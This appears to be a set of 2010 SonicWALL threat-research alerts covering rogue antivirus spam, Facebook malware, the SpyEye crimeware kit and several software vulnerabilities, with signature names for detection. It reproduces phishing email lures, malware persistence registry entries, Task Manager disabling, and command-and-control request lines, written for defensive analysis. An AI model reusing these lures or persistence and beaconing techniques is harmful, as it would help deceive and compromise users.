Defense Center – Rogue AV (June 25, 2010)

/in /by

SonicWALL UTM Research team found instances of a new Rogue AV downloader being spammed in the wild with the theme “Statement of Fees”. The e-mail contains the downloader file inside the zip attachment.

Below is a sample e-mail:

Email Campaign – Statement of Fees

Subject: Statement of fees 2010

Attachment: Statement_of_Fees_2010.DOC.zip (contains Statement_of_Fees_2010.DOC.exe)

Email Body:
————————
Please find attached a statement of fees as
requested, this will be posted today.
The accomodation is dealt with by another
section and I have passed your request on to them
today

Kind regards.
{email sender}
————————

The e-mail message looks like below:

    screenshot

Malicious executable file inside the zip attachment disguise itself as a document file via Microsoft Word icon:

screenshot

Once the user runs the executable file, the Trojan will download and install the Rogue AV from the following URLs:

  • http://(REMOVED)fic.com/ms04/ad
  • http://(REMOVED)can.com/ms04/ad
  • http://(REMOVED)kol.com/ms04/ad

Prior to downloading the Rogue AV, it will first do the following system activities:

  • To ensure that only one intance of this downloader runs in the memory, it creates a mutex: AAB647AB-4C1A-4cf0-9DE5-DD056FABF1F9
  • Adds the following in the registry:
    Key: [HKEY_CURRENT_USERPrintersConnections] Data: “subid”=”landing”
    Data: “affid”=”396”
  • Creates the file _favdata.dat at Documents and SettingsAll UsersFavorites folder with the following content:
    386
    landing
  • Verifies that the location of the user is not in the following list before continuing its installation:
    – Azerbaijan
    – Belarus
    – Czech Republic
    – Kazakhstan
    – Kyrgyzstan
    – Poland
    – Russia
    – Ukraine
    – Uzbekistan

Rogue AV Installation

    screenshot

    screenshot

    screenshot

    Files Added:

    • (Temp)wscsvc32.exe – GAV: Conficker.gen (Worm)
    • (Temp)autmgr32.exe – GAV: Tibs.JF (Trojan)

    • (Program Files)Defense Center
    • (Program Files)Defense Centerdefcnt.exe – GAV: Conficker.gen (Worm)
    • (Program Files)Defense Centerdefext.dll – GAV: Conficker.gen (Worm)
    • (Program Files)Defense Centerdefhook.dll – GAV: Conficker.gen (Worm)

    • Documents and Settings{User}Start MenuProgramsDefense Center
    • Documents and Settings{User}Start MenuProgramsDefense CenterAbout.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterActivate.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterBuy.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterDefense Center Support.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterDefense Center.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterScan.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterSettings.lnk
    • Documents and Settings{User}Start MenuProgramsDefense CenterUpdate.lnk

    Registries Added:

      Auto Startup Entry
    • Key: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
      Value: Defense Center
      Data: “”C:Program FilesDefense Centerdefcnt.exe” -noscan”
      Disables Task Manager
    • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
      Value: DisableTaskMgr
      Data: dword:00000001
    • Key: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
      Value: DisableTaskMgr
      Data: dword:00000001
      Shell Spawning
    • Key: HKEY_CLASSES_ROOT.exeshellopencommand
      Value: @
      Data: autmgr32.exe /START “%1″ %*”
    • Key: HKEY_CLASSES_ROOTsecfileshellopencommand
      Value: @
      Data: autmgr32.exe /START “%1″ %*”

    Registries Modified:

    • Key: HKEY_CLASSES_ROOT.exe
      Value: @
      Original Data: “exefile”
      New Data: “secfile”

    After installation, the Rogue AV will pretend to perform full system scan for any malware infection. At the end of scanning it displays fake results indicating malware infection on the system:

      screenshot

    Once the user clicks the button to remove the threats, it will prompt for product activation which redirects the user to its payment portal.

      screenshot

      screenshot

    SonicWALL Gateway AntiVirus provides protection against these spammed Rogue AV variants via following signatures:

    • GAV: TDSS.BHKV (Trojan) – (6,204 hits)
    • GAV: Tibs.JF (Trojan)
    • Tdss.BEEA_2 (Trojan))
    • GAV: Conficker.gen (Worm)

    screenshot

ISC DHCP Server Denial of Service (June 18, 2010)

/in /by

The Dynamic Host Configuration Protocol (DHCP) is a computer networking protocol used by hosts (DHCP clients) to retrieve IP address assignments and other configuration information. DHCP uses a client-server architecture and utilizes UDP ports 67 and 68 for communication. The client sends a broadcast request for configuration information. The DHCP server receives the request and responds with configuration information from its configuration database. A typical DHCP transaction looks like:

[ Client ]—– DISCOVER —->[ Server ]
[ Client ]<------ OFFER ------[ Server ]
[ Client ]—– REQUESST —->[ Server ]
[ Client ]<------- ACK -------[ Server ]

All DHCP messages consist of a fixed-length header and some variable-length options. Each individual option record has the following format:

OffsetSizeValue
==============================
00001Option code
00011Option length (len)
0002lenOption data

One of the option records is option 61, the Client Identifier.

A denial of service vulnerability exists in ISC DHCP server, which is the most widely used open source DHCP implementation. Specifically, the vulnerability is due to a design error in the handling of crafted Client Identifier option record. A remote attacker could exploit this vulnerability by sending a crafted DHCP message to the target server. Successful exploitation would terminate the process and cause a denial of service condition.

The CVE identifier for this vulnerability is CVE-2010-2156.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 1079 ISC DHCP Server Client ID DoS

Malware targeting Facebook (June 18, 2010)

/in /by

SonicWALL UTM Research team observed reports of a new Facebook malware being spammed via private messages through Facebook. The message pretends to contain link to a photo album but eventually leads to download of the malware.

Thousands of users were reportedly affected by this malware. Messages sent by the malware from the infected machine looks like:

  • “You? I find it on google. http://www.onli(REMOVED)albums.org/Ephraim_Garlit”
  • “That yours? I find it on google. http://www.onli(REMOVED)albums.org/Rhoda_Octavia”

If the recipient user clicks the link, it leads them to a malicious site that looks like:

screenshot

Malware gets downloaded when user clicks on the photo album:

screenshot

If the user attempts to open the downloaded executable it will perform following activities:

  • It displays a dialog box showing a fake message of filetype not supported by OS:

    screenshot

  • It drops three malicious executable files and executes them:
    • (TEMP)1.exe
    • (TEMP)2.exe
    • (TEMP)3.exe

Process 1.exe

This process scans for any open Internet Explorer or Firefox instances and terminates them to ensure that code injected by process 3.exe gets executed during next browsing session.

Process 2.exe

This process performs following file and registry modifications:

  • Drops a copy of itself at (Application Data)dfw.exe [Detected as GAV: Kbot.ANJ (Trojan)]

  • Adds registry entry HKLMSOFTWAREMicrosoftWindowsCurrentVersionRundfw.exe: “”(Application Data)dfw.exe”” to ensure that it runs on system restart.

  • Memory dump showing the strings related to Facebook during this process run:

    • screenshot

Process 3.exe

  • Scans for security related processes like Kaspersky, F-Secure, Comodo and terminates them when found.

  • Attempts to disable System Restore functionality.

  • Drops a malicious DLL at (Application Data)Windows Serverckiobo.dll [Detected as GAV: Small.ACMO (Trojan)]

  • Adds registry entries
    • HKLMSYSTEMControlSet001ControlSession ManagerAppCertDllsAppSecDll: “(Application Data)Windows Serverckiobo.dll”
    • HKLMSYSTEMCurrentControlSetControlSession ManagerAppCertDllsAppSecDll: “(Application Data)Windows Serverckiobo.dll”

  • Injects malicious DLL code into the memory which gets executed when user attempts to connect to Facebook via IE or Firefox.

  • Deletes itself.

Following HTTP requests were initiated by the malware once the user logs onto Facebook on an infected machine:

  • GET /message.php?subid=284&version=_nn2&id=(REMOVED)XAOBd00TglD6O HTTP/1.1 Host: smartcontrol.info
  • GET /ab/setup.php?act=filters&id=(REMOVED)Qf7E4s2t&ver=2 HTTP/1.1 Host: spmfb3309.com
  • POST /ab/setup.php?act=data HTTP/1.1 Host: spmfb3309.com

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Kbot.ANJ (Trojan) signature.

MS hcp-URL Cross Site Scripting (June 10, 2010)

/in /by

Just one day after the busy Microsoft Patch Day in June with ten security bulletins fixing 34 vulnerabilities, a new Cross Site Script (XSS) issue is published disclosed by Tavis Ormandy. It can potentially lead to shellcode execution within the logged in user’s security context.

Microsoft Windows Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”, a typical example is provided in the Windows XP Command Line Reference as bellow. Please refer to http://technet.microsoft.com/en-us/library/bb490918.aspx for details.

helpctr [/url [URL]] [/mode [URL]] [/hidden] [/fromstarthelp]

Help and Support Center application is by default installed in c:windowspchealthhelpctrbinaries with filename helpctr.exe in Windows XP SP2 and after. It can be passed by web browser with a HCP URL through its command line argument “/fromhcp”. This flag switches the help centre into a restricted mode, which will only permit a white-listed set of help documents and parameters.

The application is using a function “MPC::HTML::UrlUnescapeW()” to normalize the URL, which in turn uses MPC::HexToNum() to translate URL escape sequences into their original characters. However, the return code from MPC::HexToNum() is not well sanitized as required, which allows the unexpected garbage is returned to the standard string class variable. This error could allow an attacker evade the white-list detection mentioned before. On top of that, the hacker may take use of some web accessible documents to call the vulnerable function, and execute the encoded shellcode. An example of the document could be:

C:WINDOWSpchealthhelpctrSystemsysinfosysinfomain.htm

The SonicWALL UTM team has researched this vulnerability and created IPS signature to detect/prevent attacks exploiting this issue.

  • 4177 MS hcp-URL sysinfomain.htm XSS

This vulnerability is not referred by Common Vulnerabilities and Exposures (CVE) yet.

Adobe Flash Player Zero Day exploit (Jun 8, 2010)

/in /by

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2010-1297) in Adobe Flash player, Reader and Acrobat affecting Windows, Mac OS X, Linux and Solaris operating systems. Successful exploit attempts typically lead to application crash, and could potentially allow the attacker to gain control of the victim machine. Affected software versions include: Adobe Flash Player 10.0.45.2 and earlier versions, Adobe Reader and Acrobat 9.3.2 and earlier versions. Adobe issued a security advisory on June 4, 2010 warning the users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability which is a specially crafted PDF file containing a malicious packed Shockwave Flash (SWF) file and a malicious encoded JavaScript. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

Decoded version of JavaScript extracted from the PDF file shows presence of shellcode that drops a malicious executable file onto the target machine:

screenshot

The embedded malicious SWF file looks like this when executed:

screenshot

The malicious PDF file when opened performs the following:

  • Encoded JavaScript uses heap spraying technique via large Unicode strings to effectively place the embedded shellcode into the memory.
  • Malicious SWF file gets executed which triggers the vulnerability and causes the Adobe application to crash.
  • The application crash further leads to the execution of the shellcode that already resides within the memory.
  • The shellcode is responsible for extracting and dropping a malicious executable file from the PDF onto the victim machine.
    • c:-.exe [Detected as: GAV: DownLdr.AC (Trojan)]

The downloaded malware executable is a backdoor Trojan that performs following activities on the victim machine:

  • Sends GET request: GET /ddradmin/ddrh.ashx?guid=00000000-0000-0000-0000-000000000000 to a predetermined IP addresss. [appears to be down at the time of writing this alert]
  • Drops following files:
    • (Windows System)dllcacheqmgr.dll
    • (Windows System)qmgr.dll
    • (Windows System)es.ini
    • (Windows System)kernel64.dll
    • (Windows)EventSystem.dll

    The dropped DLL files are detected as GAV: Agent.AAQJ (Trojan).

Adobe made an announcement today about releasing security patch for Flash player on June 10, 2010 whereas security patch for Adobe Reader and Acrobat will be available on June 29, 2010.

SonicWALL UTM appliance provides protection against this threat via GAV: Pdfka.CKQ (Exploit) and IPS: Adobe PDF File with Flash signatures.

Desktop Security 2010 – Rogue AV (May 6, 2010)

/in /by

SonicWALL UTM Research team observed reports of a new Rogue AV downloader being spammed in the wild since yesterday via Invoice e-mail spam and Ecard e-mail spam campaigns. The Downloader Trojan arrives as an e-mail attachment or gets downloaded via a URL in the e-mail.

Campaign #1 – Transaction Invoice e-mail spam

Subject: Your transaction has been processed

Attachment: invoice.zip (contains invoice.exe)

Email Body:
————————
Your transaction has been processed by WorldPay, on behalf of Amazon Inc.
The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
And will inform you about delivery.
Sincerely,
Amazon Team
————————

The e-mail message looks like below:

screenshot

Campaign #2 – Ecard e-mail spam

Subject: You Have Received a Greeting Card

Attachment: none

Email Body:
————————
Good day.
You have received an eCard

To pick up your eCard, click on the following link (or copy & paste it
into your web browser):

htt://groups.google.com/group/{REMOVED}/setup.zip

Your card will be available for pick-up beginning for the next 30
days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!
————————

The e-mail message looks like below:

screenshot

When the user clicks the URL, it will lead to this Google Groups page pointing to the Rogue AV downloader.

screenshot

Installation
Installs itself as the following files and could use different file names per every infection:

  • Program FilesCommon FilesMicrosoft SharedDWApplicationReporting.exe – (151,040 bytes)
  • Program FilesCommon FilesMicrosoft SharedDW1033WindowsTMOperating.exe- (151,040 bytes)
  • Program FilesCommon FilesMicrosoft SharedDW1036ErrorMicrosoft.exe – (151,040 bytes)
  • Program FilesWindows NTAccessoriesWindowsMicrosoft.exe – (151,040 bytes)
  • Program FilesOnline ServicesProvidersRefer.exe – (151,040 bytes)

It attempts to connect to securehttpss.com and downloads Desktop Security 2010 Installer vi following HTTP request:

  • GET Request: GET /getfile.php?r={random 10 digits character}&p={REMOVED}=

Installs the Desktop Security 2010 Rogue AV as seen below:

screenshot

screenshot

Registry Changes

    Added Registry

  • Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun>
    Value: TCPViewSysinternals
    Data: “C:Documents and Settings(UserName)Desktopinvoice.exe”

    Value: SAPI5WindowsTM
    Data: “c:program filescommon filesmicrosoft sharedspeech1033windowstmoperating.exe”

  • Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunServices
    Value: DWIntl20Application
    Data: “Program FilesCommon FilesMicrosoft SharedDW1036ErrorMicrosoft.exe”

    Value: wordpadWindows
    Data: “Program FilesWindows NTAccessoriesWindowsMicrosoft.exe”

    Value: NotificationsSubscriber
    Data: “Program FilesCommon FilesMicrosoft SharedDWApplicationReporting.exe”

    Value: moreInternet
    Data: “Program FilesOnline ServicesProvidersRefer.exe”

  • Key: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
    Value: Desktop Security 2010
    Data: “Application DataDesktop Security 2010Desktop Security 2010.exe” /STARTUP

    Value: SecurityCenter
    Data: “Application DataDesktop Security 2010securitycenter.exe”

  • Key: HKCUSoftwareMicrosoftWindowsCurrentVersionUninstallDesktop Security 2010
    Value: DisplayName
    Data: “Desktop Security 2010”

    Value: UninstallString
    Data: “Application DataDesktop Security 2010securityhelper.exe” /UNINSTALL

    Value: DisplayIcon
    Data: “Application DataDesktop Security 2010securityhelper.exe”,1

Remote Server Connection:

    This Rogue AV tries to connect to remote server and reports back system information and installation logs. Shown below is sample data sent to the server:

screenshot

SonicWALL Gateway AntiVirus provided protection against these spammed Rogue AV variants via following signatures:

  • GAV: FakeAlert.GEN_6 (Trojan)- (3 million hits recorded till now)
  • GAV: FakeAV.DH (Trojan)

screenshot

Protection Center – Rogue AV (June 4, 2010)

/in /by

SonicWALL UTM Research team observed reports of a new Rogue AV downloader being spammed in the wild using variety of email themes. The e-mail contains the downloader file inside the zip attachment. Below are the sample e-mails for each of these spam themes:

Campaign #1 – Online Order e-mail spam

Subject: Thank you for setting the oder No. [6-digits]

Attachment: label.zip (contains label.exe)

Email Body:
————————
Thank you for ordering at our online store.
Your order: Sony VAIO A1133651A, was send at your address.
The tracking number of your postal parcel is indicated in the document
attached to this letter
Please print out the postal label for receiving the parcel.

Internet Store.
————————

The e-mail message looks like below:

    screenshot

Campaign #2 – Outlook Setup Notification email spam

Subject: Outlook Setup Notification

Attachment: outlookupdate.zip (contains outlookupdate.exe)

Email Body:
————————
You have (8) messages from Microsoft Outlook.

Please re-configure your Microsoft Outlook again.

Download attached setup file and install.
————————

The e-mail message looks like below:

    screenshot

Campaign #3 – Twitter Password e-mail spam

Subject: Reset your Twitter password

Attachment: password.zip (contains password.exe)

Email Body:
————————
Hey there.

Because of the measures taken to provide safety to our
clients, your password has been changed.
You can find your new password in attached document.

Yours,
Twitter=
————————

The e-mail message looks like below:

    screenshot

Rogue AV Installation

Once the user opens the zip attachment and execute the malicious file, the Trojan will download and install the Rogue AV from the following URLs:

  • http://(REMOVED).org/ms03/ad
  • http://(REMOVED).com/ms03/ad
  • http://(REMOVED).com/ms03/ad

    screenshot

    screenshot

Files Added:

  • Documents and Settings{User}Local SettingsTempwscsvc32.exe – GAV: Conficker.gen (Worm)
  • Documents and Settings{User}Local SettingsTempmscdexnt.exe – GAV: Conficker.gen (Worm)

  • Program FilesProtection Center
  • Program FilesProtection Centercntprot.exe – GAV: Conficker.gen (Worm)
  • Program FilesProtection Centercntext.dll – GAV: Conficker.gen (Worm)
  • Program FilesProtection Centercnthook.dll – GAV: Conficker.gen (Worm)

  • Documents and Settings{User}Start MenuProgramsProtection Center
  • Documents and Settings{User}Start MenuProgramsProtection CenterAbout.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterActivate.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterBuy.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterProtection Center Support.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterProtection Center.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterScan.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterSettings.lnk
  • Documents and Settings{User}Start MenuProgramsProtection CenterUpdate.lnk

Registries Added:

    Auto Startup Entry
  • Key: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
    Value: Protection Center
    Data: “”C:Program FilesProtection Centercntprot.exe” -noscan”
    Disabling Task Manager
  • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
    Value: DisableTaskMgr
    Data: dword:00000001
  • Key: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
    Value: DisableTaskMgr
    Data: dword:00000001
    Shell Spawning
  • Key: HKEY_CLASSES_ROOT.exeshellopencommand
    Value: @
    Data: mscdexnt.exe /START “%1″ %*”
  • Key: HKEY_CLASSES_ROOTsecfileshellopencommand
    Value: @
    Data: mscdexnt.exe /START “%1″ %*”

Registries Modified:

  • Key: HKEY_CLASSES_ROOT.exe
    Value: @
    Original Data: “exefile”
    New Data: “secfile”

After installation, the Rogue AV will run and pretends to scan the whole system for any malware present. At the end of scanning it displays fake results indicating malware infection on the system. Shown below is the screenshot of the Fake detection result.

    screenshot

Once the user clicks the button to remove the threats, it will prompt for product activation which redirects the user to its payment portal.

    screenshot

    screenshot

SonicWALL Gateway AntiVirus provides protection against these spammed Rogue AV variants via following signatures:

  • GAV: Suspicious#polycrypt.12 (Worm) – (5,996,197 hits)
  • GAV: Suspicious#fakeav_4 (Trojan) – (339,789 hits)
  • GAV: FakeAV.DN (Trojan)
  • GAV: Conficker.gen (Worm)

screenshot

screenshot

OPIE Off-by-one Stack Buffer Overflow (June 3, 2010)

/in /by

“One time Passwords In Everything” (OPIE) is a mature, Unix-like login and password package installed on the server and the client which makes un-trusted networks safer against password-sniffing packet-analysis software. It works by circumventing the delayed attack method because the same password is never used twice after installing IPIE. OPIE is shipped with DragonFly BSD, FreeBSD and OpenSUSE. The OPIE package is sometimes used by FTP servers to provide security for an FTP session.

File Transfer Protocol (FTP) is a standard network protocol used to copy a file from one host to another over a TCP/IP-based network. The protocol is defined in RFC 959. A successful FTP transfer includes a control connection and a data connection. All the communication commands between the server and client will be transferred on the control connection. A typical control traffic is listed as bellow:

Response:	220-FileZilla Server version 0.9.29 beta Response:	220-written by Tim Kosse (Tim.Kosse@gmx.de) Response:	220 Please visit http://sourceforge.net/projects/filezilla/ Command:	USER user Response:	331 Password required for user Command:	PASS ********* Response:	230 Logged on

One of the commands included in the FTP protocol is the USER command. This command is used to begin the login process, which can be found in the above example. When an FTP server is using the OPIE package, it will pass on the value of the username field to the package for processing.

A buffer-overflow vulnerability exists in OPIE. The vulnerability is due to an off-by-one error in the username handle function while processing the value of the username field of the USER command. Specifically, the vulnerable code truncate the username field into a maximum 32 bytes string, and copies it to a fixed 32 bytes buffer, then appends a Null character at the end of the string, which may overwrite the immediate following data by one byte. Successful exploitation of this vulnerability could result in execution of arbitrary code with root privileges.

SonicWALL UTM team has researched this vulnerability, and covers the exploits with the following IPS signatures:

  • 30 USER Command BO Attempt
  • 4598 Generic Server Application Buffer Overflow Exploit 3

This vulnerability is referred by CVE as CVE-2010-1938.

SpyEye crimeware toolkit (May 28, 2010)

/in /by

SonicWALL UTM Research team has been continuously monitoring newer variants of the SpyEye bots in the wild. In our detailed analysis of the SpyEye crimeware toolkit we found it to be very similar to Zeus in terms of functionality and features.

SpyEye is a web-based crimeware toolkit that was first released in early January, 2010 on underground forums. It is written in C++ and the size of the compiled bot was approximately 60KB in the first version. The newer version of SpyEye includes compression options which further reduces the size of the compiled binary to ~40KB. The main objective of this bot like Zeus is to steal financial information that includes banking credentials & credit card numbers as well as other sensitive information from victim machine.

SpyEye contains many interesting features which are listed below with the most notable being its ability to kill Zeus bot infection on the victim machine. This feature was not originally present but was added in version 1.0.7 onwards. This bot functions in ring3 mode like Zeus and runs hidden from the task manager, file explorer and other user-mode monitoring applications. Screenshot below shows SpyEye v1.0.7 toolkit in action:

screenshot

SpyEye version 1.0.7 toolkit features:

  • Formgrabber – Supports logging web form data for browsers like IE, Firefox, and Netscape.
  • Credit Card AutoFill module – Automates the process of getting money from stolen credit cards.
  • Steal FTP, POP3 & HTTP basic authorization accounts.
  • Daily e-mail backup.
  • Feature to kill Zeus bot infection.
  • UPX compression & encrypted configuration file.
  • Web-based control panel (PHP & MYSQL based).
  • Ability to detect and clean SpyEye infection.

The build and configuration file generated by the tool kit can be seen here:

screenshot

Screenshot of SpyEye web control panel main page:

screenshot

Screenshot showing the status of various bots and tasks (posted by the author):

screenshot

Network traffic generated by the BOT

  • Bot sends following message containing system information to the C&C server upon successful infection from victim machine:

    GET /gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628

  • A sample of command received from the C&C server instructing the bot to update itself:

    UPDATE
    PATH=http://(REMOVED)/bin/ups.exe [Detected as GAV: SpyEye.AI (Trojan)]

The SpyEye toolkit is currently offered on underground forums for $500 with extra charges for newer features. The toolkit is continuously being updated with more sophisticated features and could be potential contender of surpassing Zeus and becoming king of crimware toolkits in future.

SonicWALL Gateway AntiVirus provides protection against SpyEye bot via GAV: SpyeEye.KD (Trojan), GAV: SpyEyes.DG_2 (Trojan) and GAV: Suspicious#spyeye (Trojan) signatures.

Adobe Photoshop ABR BO (May 28, 2010)

/in /by

Adobe Photoshop is a multi-platform graphics editor developed and published by Adobe Systems. Adobe Photoshop is capable of handling numerous types of image file formats. One of the formats it can handle is ABR. ABR is a proprietary file format which describes Adobe Photoshop brushes. An ABR file contains multiple structures describing a Photoshop brush. One of the structures contained is BrshObjc which contains the description of a brush stored in the following format:

Size Name Field ------------------------------------------------- 12 bytes DmtrUntF Diameter 12 bytes HrdnUntF Hardness 12 bytes AnglUntF Angle 12 bytes RndnUntF Roundness 12 bytes SpcnUntF Spacing 4 bytes Intrbool Interface 4 bytes flipXbool flipX 4 bytes flipYbool flipY

A buffer overflow vulnerability exists in Adobe Photoshop. The vulnerability is due to insufficient validation of the size of the AnglUntF structure. The vulnerable code uses the size value supplied in the Ang1UntF field as a parameter to the strncpy function. The vulnerable code will copy the specified number of bytes into a statically allocated heap buffer. This vulnerability can be exploited via numerous other file types that contain a brush definition.

In order to exploit this vulnerability remotely, an attacker must entice the target user to download and view a malicious file. Successful exploitation will result in a buffer overflow which may lead to process flow diversion within the context of the currently logged in user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

SonicWall has released an IPS signature to address a specific exploit targeting this vulnerability. The following signature has been released:

  • 5552 – Adobe Photoshop CS4 ABR File BO PoC

The vendor has released an advisory regarding this issue. The vulnerability has been assigned CVE-2010-1296 by mitre.